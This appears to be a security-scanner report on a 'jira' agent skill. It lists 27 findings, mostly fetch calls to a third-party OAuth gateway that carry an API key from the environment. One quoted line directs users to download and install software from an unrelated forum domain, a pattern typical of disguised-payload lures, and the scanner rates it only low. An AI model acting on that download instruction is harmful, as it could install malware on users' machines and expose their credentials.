Skip to main content

jira

Integrates with Jira API for issue management, project tracking, and workflow automation using OAuth authentication.

Install this skill

or
61/100

Security score

The jira skill was audited on Feb 11, 2026 and we found 27 security issues across 4 threat categories. Review the findings below before installing.

Categories Tested

Security Issues

medium line 327

Template literal with variable interpolation in command context

SourceSKILL.md
327{ headers: { 'Authorization': `Bearer ${process.env.MATON_API_KEY}` } }
medium line 334

Template literal with variable interpolation in command context

SourceSKILL.md
334`https://gateway.maton.ai/jira/ex/jira/${cloudId}/rest/api/3/search/jql?jql=project=KEY`,
medium line 335

Template literal with variable interpolation in command context

SourceSKILL.md
335{ headers: { 'Authorization': `Bearer ${process.env.MATON_API_KEY}` } }
low line 325

Fetch to external URL

SourceSKILL.md
325const resources = await fetch(
low line 327

Access to .env file

SourceSKILL.md
327{ headers: { 'Authorization': `Bearer ${process.env.MATON_API_KEY}` } }
low line 335

Access to .env file

SourceSKILL.md
335{ headers: { 'Authorization': `Bearer ${process.env.MATON_API_KEY}` } }
low line 4

External URL reference

SourceSKILL.md
4Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or wo
low line 15

External URL reference

SourceSKILL.md
15Download and install (Windows, MacOS) from: https://openclawcli.forum/
low line 25

External URL reference

SourceSKILL.md
25req = urllib.request.Request('https://gateway.maton.ai/jira/oauth/token/accessible-resources')
low line 33

External URL reference

SourceSKILL.md
33req = urllib.request.Request('https://gateway.maton.ai/jira/ex/jira/{cloudId}/rest/api/3/search/jql?jql=project%3DKEY&maxResults=10')
low line 42

External URL reference

SourceSKILL.md
42https://gateway.maton.ai/jira/{native-api-path}
low line 60

External URL reference

SourceSKILL.md
60"url": "https://yoursite.atlassian.net",
low line 81

External URL reference

SourceSKILL.md
811. Sign in or create an account at [maton.ai](https://maton.ai)
low line 82

External URL reference

SourceSKILL.md
822. Go to [maton.ai/settings](https://maton.ai/settings)
low line 87

External URL reference

SourceSKILL.md
87Manage your Jira OAuth connections at `https://ctrl.maton.ai`.
low line 94

External URL reference

SourceSKILL.md
94req = urllib.request.Request('https://ctrl.maton.ai/connections?app=jira&status=ACTIVE')
low line 106

External URL reference

SourceSKILL.md
106req = urllib.request.Request('https://ctrl.maton.ai/connections', data=data, method='POST')
low line 118

External URL reference

SourceSKILL.md
118req = urllib.request.Request('https://ctrl.maton.ai/connections/{connection_id}')
low line 132

External URL reference

SourceSKILL.md
132"url": "https://connect.maton.ai/?session_token=...",
low line 146

External URL reference

SourceSKILL.md
146req = urllib.request.Request('https://ctrl.maton.ai/connections/{connection_id}', method='DELETE')
low line 159

External URL reference

SourceSKILL.md
159req = urllib.request.Request('https://gateway.maton.ai/jira/ex/jira/{cloudId}/rest/api/3/project')
low line 326

External URL reference

SourceSKILL.md
326'https://gateway.maton.ai/jira/oauth/token/accessible-resources',
low line 334

External URL reference

SourceSKILL.md
334`https://gateway.maton.ai/jira/ex/jira/${cloudId}/rest/api/3/search/jql?jql=project=KEY`,
low line 349

External URL reference

SourceSKILL.md
349'https://gateway.maton.ai/jira/oauth/token/accessible-resources',
low line 357

External URL reference

SourceSKILL.md
357f'https://gateway.maton.ai/jira/ex/jira/{cloud_id}/rest/api/3/search/jql',
low line 397

External URL reference

SourceSKILL.md
397req = urllib.request.Request('https://ctrl.maton.ai/connections')
low line 410

External URL reference

SourceSKILL.md
410- [JQL Reference](https://support.atlassian.com/jira-service-management-cloud/docs/use-advanced-search-with-jira-query-language-jql/)
Scanned on Feb 11, 2026
View Security Dashboard
Installation guide →